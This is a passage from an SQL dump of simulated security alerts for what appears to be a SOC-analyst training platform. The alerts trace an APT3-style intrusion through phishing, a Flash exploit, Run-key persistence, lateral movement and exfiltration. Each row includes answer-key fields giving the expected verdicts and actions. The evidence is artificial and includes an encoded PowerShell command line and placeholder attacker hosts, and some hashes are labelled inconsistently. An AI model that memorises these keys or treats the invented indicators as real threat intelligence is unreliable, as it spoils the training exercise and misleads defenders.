CVE-2015-3113.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT3 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"security@update-alerts.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Email associated with phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Campaign\",\"date\":\"2026-02-08T19:00:02.546Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1221, 'Execution of Exploit Code', 'high', 'Endpoint Detection and Response (EDR)', 'Upon visiting the compromised website, the victim\'s unpatched Adobe Flash Player automatically executes the embedded exploit, allowing APT3 to gain a foothold.', 'Exploit', 'T1203', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_id\":\"EDR-20231001-001\",\"source_ip\":\"192.168.10.15\",\"destination_ip\":\"203.0.113.45\",\"file_name\":\"flash_exploit.swf\",\"file_hash\":\"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\",\"user\":\"jdoe\",\"action\":\"Execution of exploit\",\"process_name\":\"FlashPlayer.exe\",\"exploit_name\":\"CVE-2023-XXXX\",\"attacker_ip\":\"203.0.113.45\",\"attacker_domain\":\"malicious-website.com\"}', '2026-02-07 21:28:52', '2026-02-19 15:53:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used by the victim machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT3 activity.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"flash_exploit.swf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Exploit file used for the attack.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\",\"is_critical\":true,\"osint_result\":{\"source\":\"virustotal\",\"verdict\":\"malicious\",\"details\":\"Hash matched with known exploit used by APT3.\"}},{\"id\":\"artifact_5\",\"type\":\"domain\",\"value\":\"malicious-website.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Domain associated with APT3 
operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1222, 'Establishing Persistence with Backdoor', 'high', 'System Registry Logs', 'APT3 installs a backdoor on the compromised system by modifying the Windows Registry to ensure persistent access. This involves creating a registry key that launches the backdoor executable during system startup.', 'Persistence', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-09-15T14:23:51Z\",\"event_id\":4657,\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"registry_path\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\"registry_key\":\"MaliciousBackdoor\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"file_hash\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"username\":\"compromised_user\",\"action\":\"Registry key modification\",\"description\":\"A registry key was added to enable persistence of the backdoor malware.\"}', '2026-02-07 21:28:52', '2026-02-19 15:51:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT3 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor used by APT3.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis Service\",\"verdict\":\"malicious\",\"details\":\"File found to be a persistent backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account potentially 
compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.550Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-15T14:23:51Z\\\",\\\"event_id\\\":4657,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"registry_path\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key\\\":\\\"MaliciousBackdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Registry key modification\\\",\\\"description\\\":\\\"A registry key was added to enable persistence of the backdoor malware.\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.550Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-15T14:23:51Z\\\",\\\"event_id\\\":4657,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"registry_path\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key\\\":\\\"MaliciousBackdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Registry key modification\\\",\\\"description\\\":\\\"A registry key was added to enable persistence of the backdoor malware.\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.550Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-15T14:23:51Z\\\",\\\"event_id\\\":4657,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"registry_path\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key\\\":\\\"MaliciousBackdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Registry key modification\\\",\\\"description\\\":\\\"A registry key was added to enable persistence of the backdoor malware.\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.550Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-15T14:23:51Z\\\",\\\"event_id\\\":4657,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"registry_path\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key\\\":\\\"MaliciousBackdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Registry key modification\\\",\\\"description\\\":\\\"A registry key was added to enable persistence of the backdoor malware.\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.550Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-15T14:23:51Z\\\",\\\"event_id\\\":4657,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"registry_path\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key\\\":\\\"MaliciousBackdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"Registry key modification\\\",\\\"description\\\":\\\"A registry key was added to enable persistence of the backdoor malware.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1223, 'Lateral Movement via Stolen Credentials', 'high', 'Active Directory Logs', 'APT3 executed lateral movement by leveraging stolen credentials, accessing critical infrastructure and data repositories.', 'Credential Access', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T15:23:45Z\",\"event_id\":\"4624\",\"logon_type\":\"3\",\"logon_account\":\"victim_user\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.0.0.8\",\"domain\":\"CORP\",\"workstation_name\":\"CORP-WORKSTATION-05\",\"attacker_ip\":\"203.0.113.45\",\"access_granted\":true,\"involved_files\":[{\"filename\":\"critical_data.xlsx\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}],\"related_processes\":[{\"process_name\":\"svchost.exe\",\"process_id\":\"1111\"}]}', '2026-02-07 21:28:52', '2026-02-19 15:50:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"IP address of critical internal server.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT3 activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"critical_data.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file accessed during unauthorized logon.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"clean\",\"details\":\"File hash corresponds to a known benign 
file.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"victim_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Username used to access resources illegitimately.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1224, 'Data Exfiltration to Remote Server', 'high', 'Network Traffic Analysis', 'APT3 successfully exfiltrated sensitive data to a remote server under their control. The operation was detected through unusual network traffic patterns and data flow volumes originating from an internal host to an external IP associated with known malicious activity.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"10.0.1.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"confidential_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"action\":\"exfiltration\",\"bytes_transferred\":10485760,\"network_context\":{\"internal_network\":\"10.0.0.0/8\",\"external_network\":\"203.0.113.0/24\"},\"alert_id\":\"alert_20231015_0005\"}', '2026-02-07 21:28:52', '2026-02-19 15:50:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT3 command and control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"suspicious\",\"details\":\"Hash corresponds to files often used in data exfiltration campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal File Audit\",\"verdict\":\"suspicious\",\"details\":\"File not typically transferred outside the organization.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account associated with recent access pattern 
anomalies.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1225, 'Suspicious Flash Exploit Detected', 'high', 'Intrusion Detection System (IDS)', 'APT3 initiates the attack by exploiting a zero-day vulnerability in Adobe Flash, aiming to deliver the initial payload into the target network.', 'Initial Access', 'T1190', 1, 'investigating', 136, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"IDS-2023-45789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.105\",\"protocol\":\"HTTP\",\"method\":\"GET\",\"url\":\"http://malicious-example.com/exploit.swf\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\",\"file_name\":\"exploit.swf\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"alert_message\":\"Suspicious Flash Exploit Detected targeting Adobe Flash Player\"}', '2026-02-07 21:29:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT3 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted host.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-example.com/exploit.swf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL hosting a malicious Flash exploit linked to APT3.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash of a known malware file used by 
APT3.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"IDS-2023-45789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"method\\\":\\\"GET\\\",\\\"url\\\":\\\"http://malicious-example.com/exploit.swf\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\\",\\\"file_name\\\":\\\"exploit.swf\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_message\\\":\\\"Suspicious Flash Exploit Detected targeting Adobe Flash Player\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"IDS-2023-45789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"method\\\":\\\"GET\\\",\\\"url\\\":\\\"http://malicious-example.com/exploit.swf\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\\",\\\"file_name\\\":\\\"exploit.swf\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_message\\\":\\\"Suspicious Flash Exploit Detected targeting Adobe Flash 
Player\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"IDS-2023-45789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"method\\\":\\\"GET\\\",\\\"url\\\":\\\"http://malicious-example.com/exploit.swf\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\\",\\\"file_name\\\":\\\"exploit.swf\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_message\\\":\\\"Suspicious Flash Exploit Detected targeting Adobe Flash Player\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"IDS-2023-45789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"method\\\":\\\"GET\\\",\\\"url\\\":\\\"http://malicious-example.com/exploit.swf\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\\",\\\"file_name\\\":\\\"exploit.swf\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_message\\\":\\\"Suspicious Flash Exploit Detected targeting Adobe Flash Player\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"IDS-2023-45789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"method\\\":\\\"GET\\\",\\\"url\\\":\\\"http://malicious-example.com/exploit.swf\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\\",\\\"file_name\\\":\\\"exploit.swf\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_message\\\":\\\"Suspicious Flash Exploit Detected targeting Adobe Flash Player\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1226, 'Unusual Execution of Flash Script', 'high', 'Endpoint Detection and Response (EDR)', 'The malicious payload leverages the Flash exploit to execute code on the victim\'s machine, setting the stage for further compromise. This activity was detected as an unusual execution of Flash script on the endpoint.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-23T14:23:45Z\",\"event_type\":\"execution\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"user\":\"jdoe\",\"process_name\":\"flash_player.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_flash.swf\",\"event_id\":\"EDR-20231023-001\",\"alert_level\":\"high\",\"description\":\"Detected execution of a Flash script exploiting a known vulnerability to execute malicious code.\"}', '2026-02-07 21:29:13', '2026-02-19 15:48:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server involved in multiple campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known Flash exploit payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_flash.swf\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"suspicious\",\"details\":\"Suspicious Flash file executing on the 
host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
